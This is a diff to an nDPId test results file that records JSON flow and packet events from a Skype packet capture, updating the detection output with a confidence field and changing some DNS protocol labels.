+00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":899,"source":"skype.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969675413,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":900,"source":"skype.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969675413,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":900,"source":"skype.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":1,"flow_last_seen":1431969675413,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"ts_msec":1431969675413,"pkt":"0NQSxnP1PBXCt3IOCABFAAA3KwsAAEARbhfAqAEinTeCkjLdgQkAI6nfnE4CnxxG0E+kNYaCqSmEqqaVzyCf2xFtLT6I"}
-00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":900,"source":"skype.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969675413,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":900,"source":"skype.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969675413,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":901,"source":"skype.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675567,"flow_last_seen":1431969675567,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1431969675567,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":50024,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":901,"source":"skype.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":1,"flow_last_seen":1431969675567,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1431969675567,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoxtNAAEAGPGLAqAEiEaxkJMNoAbucCLSTZ4D+ClAR\/\/\/87QAA"}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":904,"source":"skype.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":2,"flow_last_seen":1431969675708,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431969675708,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGx+5v3UomwKgBIpxPw4sbzRl\/lAe91KASOJBx0gAAAgQFrAQCCApNf6NJPiML1gEDAwk="}
@@ -511,16 +511,16 @@
 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":908,"source":"skype.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":3,"flow_last_seen":1431969675716,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1431969675716,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoVvpAAEAGrDvAqAEiEaxkJMNoAbucCLSUZ4D+C1AQ\/\/\/87AAA"}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":913,"source":"skype.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675950,"flow_last_seen":1431969675950,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1431969675950,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55159,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":913,"source":"skype.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":1,"flow_last_seen":1431969675950,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"ts_msec":1431969675950,"pkt":"0NQSxnP1PBXCt3IOCABFAABPisQAAEARbGbAqAEiwKgBAdd3ADUAO4zaTRYBAAABAAAAAAAAAWEGY29uZmlnBXNreXBlDnRyYWZmaWNtYW5hZ2VyA25ldAAAAQAB"}
-00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":913,"source":"skype.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675950,"flow_last_seen":1431969675950,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1431969675950,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55159,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"a.config.skype.trafficmanager.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":913,"source":"skype.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675950,"flow_last_seen":1431969675950,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1431969675950,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55159,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"},"dns": {"query":"a.config.skype.trafficmanager.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":914,"source":"skype.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675950,"flow_last_seen":1431969675950,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1431969675950,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63108,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":914,"source":"skype.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":1,"flow_last_seen":1431969675950,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"ts_msec":1431969675950,"pkt":"0NQSxnP1PBXCt3IOCABFAABPsQsAAEARRh\/AqAEiwKgBAfaEADUAO+FnvnsBAAABAAAAAAAAAWEGY29uZmlnBXNreXBlDnRyYWZmaWNtYW5hZ2VyA25ldAAAHAAB"}
-00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":914,"source":"skype.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675950,"flow_last_seen":1431969675950,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1431969675950,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63108,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"a.config.skype.trafficmanager.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":914,"source":"skype.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675950,"flow_last_seen":1431969675950,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1431969675950,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63108,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"},"dns": {"query":"a.config.skype.trafficmanager.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":921,"source":"skype.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969676429,"flow_last_seen":1431969676429,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969676429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":921,"source":"skype.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":1,"flow_last_seen":1431969676429,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"ts_msec":1431969676429,"pkt":"0NQSxnP1PBXCt3IOCABFAABBH10AAEARELrAqAEinTfrkzLdnFQALfL6nFACIA2HAe7F64ULrxZmZzlp\/IcJjWPYQGVuGoQXNRtdAcprsg=="}
-00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":921,"source":"skype.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969676429,"flow_last_seen":1431969676429,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969676429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":921,"source":"skype.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969676429,"flow_last_seen":1431969676429,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969676429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":922,"source":"skype.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969676429,"flow_last_seen":1431969676429,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431969676429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":922,"source":"skype.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":1,"flow_last_seen":1431969676429,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"ts_msec":1431969676429,"pkt":"0NQSxnP1PBXCt3IOCABFAAA9SBkAAEARs0rAqAEib91NpTLdnFQAKf+JnFIC4bFrPlS3SgwUQ0ZkfJhi4Ibaq\/8x3HMPk6r8UbN8"}
-00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":922,"source":"skype.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969676429,"flow_last_seen":1431969676429,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431969676429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":922,"source":"skype.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969676429,"flow_last_seen":1431969676429,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431969676429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":931,"source":"skype.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969677018,"flow_last_seen":1431969677018,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431969677018,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.38","src_port":50063,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":931,"source":"skype.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":1,"flow_last_seen":1431969677018,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969677018,"pkt":"0NQSxnP1PBXCt3IOCABFAABAFnhAAEAGqHLAqAEib91KJsOPAbu0bGHpAAAAALAC\/\/+PWgAAAgQFtAEDAwUBAQgKPiMSEQAAAAAEAgAA"}
 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":932,"source":"skype.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":2,"flow_last_seen":1431969677045,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"ts_msec":1431969677045,"pkt":"0NQSxnP1PBXCt3IOCABFAABP37sAAEARF2\/AqAEiwKgBAdd3ADUAO4zaTRYBAAABAAAAAAAAAWEGY29uZmlnBXNreXBlDnRyYWZmaWNtYW5hZ2VyA25ldAAAAQAB"}
@@ -529,50 +529,50 @@
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":937,"source":"skype.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":3,"flow_last_seen":1431969677390,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431969677390,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0fWFAAEAGQZXAqAEib91KJsOPAbu0bGHqDtZB8IAQECx6WwAAAQEICj4jE4NNf6Ta"}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":942,"source":"skype.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969677439,"flow_last_seen":1431969677439,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969677439,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.166","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":942,"source":"skype.pcap","alias":"nDPId-test","flow_id":154,"flow_packet_id":1,"flow_last_seen":1431969677439,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"ts_msec":1431969677439,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/kxIAAEARaE7AqAEib91NpjLdnEsAK\/dAnFQCl1hxbJqFe\/EoPOrYejcO5KpAaYBpd\/JMh2XsR696PgE="}
-00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":942,"source":"skype.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969677439,"flow_last_seen":1431969677439,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969677439,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.166","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":942,"source":"skype.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969677439,"flow_last_seen":1431969677439,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969677439,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.166","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":943,"source":"skype.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969677439,"flow_last_seen":1431969677439,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969677439,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.165","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":943,"source":"skype.pcap","alias":"nDPId-test","flow_id":155,"flow_packet_id":1,"flow_last_seen":1431969677439,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1431969677439,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4mEQAAEARAMrAqAEinTeCpTLdnFoAJC3GnFYCIQGR7TxLVU8tswjr1LACebeVCHQalWySEQ=="}
-00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":943,"source":"skype.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969677439,"flow_last_seen":1431969677439,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969677439,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.165","src_port":13021,"dst_port":40026,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":943,"source":"skype.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969677439,"flow_last_seen":1431969677439,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969677439,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.165","src_port":13021,"dst_port":40026,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":944,"source":"skype.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969677439,"flow_last_seen":1431969677439,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969677439,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.157","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":944,"source":"skype.pcap","alias":"nDPId-test","flow_id":156,"flow_packet_id":1,"flow_last_seen":1431969677439,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"ts_msec":1431969677439,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1f9wAAEARGT3AqAEinTeCnTLdnE0AIXYPnFgCFJgmOhVj0TGqdlU73IOUBy59C5OuhQ=="}
-00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":944,"source":"skype.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969677439,"flow_last_seen":1431969677439,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969677439,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.157","src_port":13021,"dst_port":40013,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":944,"source":"skype.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969677439,"flow_last_seen":1431969677439,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969677439,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.157","src_port":13021,"dst_port":40013,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":950,"source":"skype.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969677975,"flow_last_seen":1431969677975,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431969677975,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58458,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":950,"source":"skype.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":1,"flow_last_seen":1431969677975,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"ts_msec":1431969677975,"pkt":"0NQSxnP1PBXCt3IOCABFAABLNkoAAEARwOTAqAEiwKgBAeRaADUAN2o90\/0BAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAABAAE="}
-00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":950,"source":"skype.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969677975,"flow_last_seen":1431969677975,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431969677975,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58458,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":950,"source":"skype.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969677975,"flow_last_seen":1431969677975,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431969677975,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58458,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
